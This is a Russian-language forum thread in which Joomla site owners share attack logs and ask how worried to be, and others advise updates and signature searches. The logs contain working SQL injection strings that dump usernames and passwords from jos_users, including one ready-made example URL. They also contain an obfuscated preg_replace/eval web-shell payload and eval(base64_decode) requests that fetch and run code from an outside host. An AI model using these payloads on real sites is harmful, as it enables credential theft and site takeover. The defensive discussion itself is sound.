Компоненты и скрипты для защиты сайта. Логи атак на сайты - страница 7 - Безопасность сайтов на Joomla

попытка взлома Поиска. Насколько это страшно?

Выполни у себя тот же запрос и посмотри сам. Не зная названий и версий всего того, что у тебя стоит, всё равно никто и ничего толкового не скажет. Как максимум - будет страница угадываний.

Вот еще:

** Union Select [GET:search] => \' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Table name in url [GET:search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Union Select [REQUEST:search] => \' and 1=2) union select 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;
** Table name in url [REQUEST:search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from jos_users-- ;

**PAGE / SERVER INFO


*REMOTE_ADDR :
46.37.166.22

*HTTP_USER_AGENT :
Mozilla/5.0

*REQUEST_METHOD :
GET

*QUERY_STRING :
option=com_kunena&func=userlist&search='+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users--+;



** SUPERGLOBALS DUMP (sanitized)


*$_GET DUMP
 -[option] => com_kunena
 -[func] => userlist
 -[search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from -- users-- ;


*$_POST DUMP


*$_COOKIE DUMP


*$_REQUEST DUMP
 -[option] => com_kunena
 -[func] => userlist
 -[search] => \' and 1=2) -- 1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15 from -- users-- ;

Выполни у себя тот же запрос и посмотри сам. Не зная названий и версий всего того, что у тебя стоит, всё равно никто и ничего толкового не скажет. Как максимум - будет страница угадываний.

А как его выполнить, я ж не хакер (? Что то в URL вбить? Я все лишние - кроме стандартных, идущих с дистрибутивом - компоненты поудалял. Стоит только Мультиэдс для рекламы, Марко плагин и УРЛы-транслитом и все.

Скажите, а Marco блокирует этих товарищей-ботов после таких запросов? У меня атаки по всем фронтам идут, по 3-4 в день на каждый сайт, независимо от версий Joomla (у меня от 1.0 до 3.0 проекты).

У ботов весна... Kunena обновить надо до 2.0.4 если старая стоит.

у меня 2.0.3 стоит и "В данный момент обновления отсутствуют. Пожалуйста, проверьте еще раз позже." И вообще как можно обезопасить себя от этих и подобных атак? Меня тоже интересует, Марко защищает или только информирует о попытке взлома?

Защищает. Kunena не автообновляется вроде еще. Бекап. Руками поверх вместе с новыми модулями. Но эксплойт не к 2.0.3

Ниже попытка взлома Поиска. Насколько это страшно?

У вас проблем быть не должно даже если и уязвимость найдется!

А как его выполнить, я ж не хакер (? Что то в URL вбить? Я все лишние - кроме стандартных, идущих с дистрибутивом - компоненты поудалял. Стоит только Мультиэдс для рекламы, Марко плагин и УРЛы-транслитом и все.

к примеру:

http://вашь сайт/index.php?option=com_kunena&func=userlist&search='+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,1

такм где option=com_kunena название компонента на который идет атака.

у меня Kunena отдала список зарегистрированных пользователей по этому запросу, хотя в настройках сайта стоит опция не показывать пользователей гостям.
Это как-то можно закрыть?

Подскажите, что тут значит лог?:

Подскажите, что тут значит лог?:

Код

#Fields: datetime	priority	category	message
2013-03-24T12:19:59+00:00	CRITICAL	jhackguard	Changed POST value from:preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x61\\x73\\x65\\x36\\x34\\x5F\\x64\\x65\\x63\\x6F\\x64\\x65\\x28\'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\'\\x29\\x29\\x29\\x3B\",\".\"); to:preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B",".");

2013-03-24T14:10:29+00:00	CRITICAL	jhackguard	Changed POST value from:preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x61\\x73\\x65\\x36\\x34\\x5F\\x64\\x65\\x63\\x6F\\x64\\x65\\x28\'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\'\\x29\\x29\\x29\\x3B\",\".\"); to:preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B",".");

Увас на сайте кто то хозяйнечиет без вашего ведома! это чужой шелл!

А где этот шелл искать?
В логах не понятно вообще ничего.
Айболит ничего такого не нашел. Указал только на лог файл, что в нем содержится шелл сигнатура.
ssf.php тоже ничего не показал критического.

В афболите ругается (но так всегда)
public_html/plugins/vmpayment/klarna/klarna/api/klarna.php
public_html/components/com_sh404sef/shSec.php
public_html/administrator/components/com_sh404sef/lib/pChart/pChart/pChart.class.php

Как искать?

Увас на сайте кто то хозяйнечиет без вашего ведома! это чужой шелл!

Запрос POST - это шелл ?

А где этот шелл искать?
В логах не понятно вообще ничего.
Айболит ничего такого не нашел. Указал только на лог файл, что в нем содержится шелл сигнатура.
ssf.php тоже ничего не показал критического.

В афболите ругается (но так всегда)
public_html/plugins/vmpayment/klarna/klarna/api/klarna.php
public_html/components/com_sh404sef/shSec.php
public_html/administrator/components/com_sh404sef/lib/pChart/pChart/pChart.class.php

Как искать?

Ищите по сигнатуре preg_replace

Запрос POST - это шелл ?

Ну и в запрос POST можно засунуть шелл, вообще в любой запрос!

вы не путаете ни чего ssf.php показывает preg_replace
если только кто то не пытался на прямую через post у вас её запустить и нет файла на сервере, то не покажет

вот за сегодня еще одна ссылочка из перенаправлений на сайте:
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--+a

Одна-две попытки в день, видимо чтоб не привлекать внимание. Подбор идет каждый день.

Удар в com_fireboard по двум сайтам. Этого компонента у меня нету .

** Table name in url [GET:func] => fb_pdf\',(select 1 from(select count(*),concat((select password from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a))-- ;** Table name in url [REQUEST:func] => fb_pdf\',(select 1 from(select count(*),concat((select password from jos_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a))-- ;**PAGE / SERVER INFO*REMOTE_ADDR :46.37.166.22*HTTP_USER_AGENT :Mozilla/5.0*REQUEST_METHOD :GET*QUERY_STRING :option=com_fireboard&Itemid=0&id=1&catid=0&func=fb_pdf',(select+1+from(select+count(*),concat((select+password+from+jos_users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a))--+;** SUPERGLOBALS DUMP (sanitized)*$_GET DUMP -[option] => com_fireboard -[Itemid] => 0 -[id] => 1 -[catid] => 0 -[func] => fb_pdf\',(select 1 from(select count(*),concat((select password from -- users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a))-- ;*$_POST DUMP*$_COOKIE DUMP*$_REQUEST DUMP -[option] => com_fireboard -[Itemid] => 0 -[id] => 1 -[catid] => 0 -[func] => fb_pdf\',(select 1 from(select count(*),concat((select password from -- users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a))-- ;

Скажите, а есть смысл у Марко в опциях навсегда блокировать IP?

Особенного нет, так как ботнет.

Сегодня была попытка взлома через форум:

Host: 5.9.221.228       
/forum/?e=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2xvY3oucnUvaHJlbWpvLnR4dCcpKTs));
Http Code: 404   Date: Apr 03 08:06:55   Http Version: HTTP/1.0   Size in Bytes: 2939
Referer: -
Agent: -
/forum/?cmd=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2xvY3oucnUvaHJlbWpvLnR4dCcpKTs));
Http Code: 404   Date: Apr 03 08:06:55   Http Version: HTTP/1.0   Size in Bytes: 2939
Referer: -
Agent: -
/forum/?img=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2xvY3oucnUvaHJlbWpvLnR4dCcpKTs));
Http Code: 404   Date: Apr 03 08:06:56   Http Version: HTTP/1.0   Size in Bytes: 2939
Referer: -
Agent: -
/forum/?var=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2xvY3oucnUvaHJlbWpvLnR4dCcpKTs));
Http Code: 404   Date: Apr 03 08:06:56   Http Version: HTTP/1.0   Size in Bytes: 2939
Referer: -
Agent: -
/forum/?php=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2xvY3oucnUvaHJlbWpvLnR4dCcpKTs));
Http Code: 404   Date: Apr 03 08:06:56   Http Version: HTTP/1.0   Size in Bytes: 2939
Referer: -
Agent: -
/forum/?text=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2xvY3oucnUvaHJlbWpvLnR4dCcpKTs));
Http Code: 404   Date: Apr 03 08:06:57   Http Version: HTTP/1.0   Size in Bytes: 2939
Referer: -
Agent: -
/?text=eval(base64_decode(ZXZhbChmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2xvY3oucnUvaHJlbWpvLnR4dCcpKTs));
Http Code: 200   Date: Apr 03 08:06:58   Http Version: HTTP/1.0   Size in Bytes: 57411
Referer: -


Последний доступ куда получил?

Последний доступ куда получил?

вы и проверьте

Вот мои логи! Может кто подскажет что означают? 

Спасибо!

вы и проверьте

Каким образом?
Дописал к названию путь...открылась главная страница...

Оченно помогла вот эта штука: Скрипт удаления вредоносного кода от icom. Только тут почему-то устаревшая версия не заменена на новую, которая носит название FAR (Find and Replace). Проверял сайты на J2.5 - доволен как слон после душа

Автору респект! 

Файлик прилагаю. Инструкция по использованию на сайте разработчика

Вот такие логи..


130.185.105.141 - - [03/May/2013:23:05:27 +0400] "GET /administrator/index.php HTTP/1.0" 200 5677 "-" "h2RhH1ZsPwi3"
